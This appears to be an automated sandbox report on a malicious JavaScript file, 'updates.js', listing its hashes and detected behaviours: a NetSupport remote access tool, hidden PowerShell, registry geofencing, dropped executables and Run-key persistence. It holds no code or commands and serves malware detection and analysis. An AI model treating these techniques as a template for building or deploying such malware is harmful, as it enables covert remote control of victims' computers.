Extracted

• • Target

    updates.js

  • Size

    7.3MB

  • MD5

    467b34c64e52ed4607202b5333ef7894

  • SHA1

    76856cf2f7fba65093b3faa20c2204a4b6bb8c51

  • SHA256

    1263960b08d1842b481e0323d80f11dcc076b57cb13663e15a8c732dbcb06139

  • SHA512

    5ecbd268e2e340cca3200bb3d5c6749264ab637a06c89852cf58179320db1a1cb162ceb220f279d38cbb3c0322010ef924fdf4b653d4a50ef56e8c90e2955240

  • SSDEEP

    49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQI:D

  Score

  10^/10

  netsupportexecutionpersistencerat

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport

  • Blocklisted process makes network request

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Checks computer location settings

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE

  • Loads dropped DLL

  • Adds Run key to start application

    persistence
  behavioral1behavioral2behavioral3